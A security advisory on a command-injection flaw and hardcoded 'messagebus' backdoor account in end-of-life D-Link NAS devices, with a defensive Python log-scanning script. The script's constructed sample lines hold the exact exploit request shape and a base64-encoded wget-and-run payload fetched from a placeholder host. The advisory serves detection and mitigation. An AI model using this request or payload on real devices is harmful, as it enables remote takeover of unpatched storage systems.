Advisory

End-of-life D-Link NAS devices have a backdoor account, over 90k exposed and vulnerable

Take action: If you run a D-Link DNS-320L, DNS-325, DNS-327L or DNS-340L NAS, check it against the list of affected firmware versions below, remove any port forward or UPnP mapping that exposes its web interface to the internet, and plan to replace it as soon as possible. No patch is coming, so an exposed unit will be compromised.


Learn More

A security researcher known as 'Netsecfish' has identified a serious vulnerability in several models of D-Link Network Attached Storage (NAS) devices. The issue, reported as CVE-2024-3273, combines an arbitrary command injection with a hardcoded backdoor account (the backdoor account was later assigned its own identifier, CVE-2024-3272).

The affected D-Link NAS device models include:

  • DNS-320L Version 1.11, Version 1.03.0904.2013, Version 1.01.0702.2013
  • DNS-325 Version 1.01
  • DNS-327L Version 1.09, Version 1.00.0409.2013
  • DNS-340L Version 1.08

A Shodan search indicates that over 90,000 vulnerable devices are online and reachable from the internet.

The flaw is in the '/cgi-bin/nas_sharing.cgi' script, in its HTTP GET request handler. Two defects combine into unauthenticated remote command execution: a hardcoded account with the username "messagebus" and an empty password, which passes the script's login check, and a command injection through the "system" parameter. An attacker sends a single HTTP GET request that logs in as "messagebus" and carries a base64-encoded shell command in the "system" parameter; the script decodes it and runs it, so arbitrary commands execute on the NAS with no prior access. Because the whole exploit is one GET request, any log or proxy that records request URLs will show the attempt.
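The following detection script is an added example for this advisory; it is not code from D-Link or from the researcher's write-up. It scans web-server access lines in the common "combined" format for the request shape described above (a GET to /cgi-bin/nas_sharing.cgi with user=messagebus, an empty passwd, and a base64 "system" parameter), decodes the injected command, and reports each hit. The log format, the parameter names and the sample lines are assumptions and constructed data, not captured traffic.

```python
"""Spot CVE-2024-3273 exploitation attempts in NAS web-server access logs.

Added example for this advisory; not D-Link's code and not the public PoC.
Assumes the "combined" access-log format and the request shape described in
the advisory: GET /cgi-bin/nas_sharing.cgi with user=messagebus, an empty
passwd, and a base64-encoded shell command in the system parameter.
"""
import base64
import binascii
import re
from urllib.parse import parse_qs, urlsplit

TARGET_SCRIPT = "/cgi-bin/nas_sharing.cgi"
BACKDOOR_USER = "messagebus"

# "combined" log format: client ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def _b64(cmd: str) -> str:
    """Helper used only to build the constructed sample lines below."""
    return base64.b64encode(cmd.encode()).decode()


# Constructed sample lines (RFC 5737 documentation addresses), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [08/Apr/2024:10:15:02 +0000] '
    f'"GET {TARGET_SCRIPT}?user={BACKDOOR_USER}&passwd=&system={_b64("id")} HTTP/1.1" '
    '200 512 "-" "curl/8.4.0"',
    '198.51.100.9 - - [08/Apr/2024:10:15:40 +0000] '
    f'"GET {TARGET_SCRIPT}?user=admin&passwd=secret HTTP/1.1" 200 1040 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [08/Apr/2024:10:16:11 +0000] '
    '"GET /web/login.html HTTP/1.1" 200 2211 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [08/Apr/2024:10:16:30 +0000] '
    f'"GET {TARGET_SCRIPT}?user={BACKDOOR_USER}&passwd=&system='
    f'{_b64("wget http://203.0.113.7/bot -O /tmp/b; sh /tmp/b")} HTTP/1.1" '
    '200 512 "-" "Go-http-client/1.1"',
]


def decode_system(value: str):
    """Decode the base64 'system' parameter; None if it is not valid base64.

    parse_qs has already turned %XX escapes back into characters, but it also
    turns a raw '+' into a space. '+' is part of the base64 alphabet, so undo
    that. Padding is restored because attackers frequently strip it.
    """
    raw = value.replace(" ", "+").strip()
    raw += "=" * (-len(raw) % 4)
    try:
        return base64.b64decode(raw, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def inspect_request(target: str):
    """Classify one request target; returns a finding dict or None."""
    parts = urlsplit(target)
    if parts.path != TARGET_SCRIPT:
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)
    user = qs.get("user", [""])[0]
    passwd = qs.get("passwd", [""])[0]
    system = qs.get("system", [None])[0]

    backdoor = user == BACKDOOR_USER   # hardcoded account, password irrelevant
    injection = system is not None     # 'system' only ever carries attacker input
    if not (backdoor or injection):
        return None                    # ordinary use of the sharing CGI

    verdict = ("exploit" if backdoor and injection
               else "backdoor_account" if backdoor else "command_injection")
    return {
        "verdict": verdict,
        "user": user,
        "empty_password": passwd == "",
        "decoded_command": decode_system(system) if injection else None,
    }


def scan_log(lines):
    """Run inspect_request over every parseable line; return the findings."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        finding = inspect_request(m["target"])
        if finding:
            finding.update(client=m["client"], time=m["time"], status=m["status"])
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['client']} {f['verdict']}: {f['decoded_command']!r}")
```

The detection keys on the script path plus either the "messagebus" user or the presence of "system", rather than on the exact PoC string, so URL-encoded, unpadded or slightly reordered variants still match. A request that decodes cleanly with an empty password is a confirmed exploit attempt; a 200 response on such a line means the device should be treated as compromised, not merely probed.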

D-Link states that these NAS devices have reached end-of-life (EOL), are no longer supported, and will not receive a patch for this vulnerability. D-Link advises users to retire them and replace them with current models that still receive regular firmware updates.

D-Link has published a security bulletin and set up a dedicated support page for legacy devices sold in the US that do not auto-update, urging users to apply the latest available firmware. Those updates do not, however, mitigate CVE-2024-3273; the only effective measures are to block the device from the internet and to retire it.
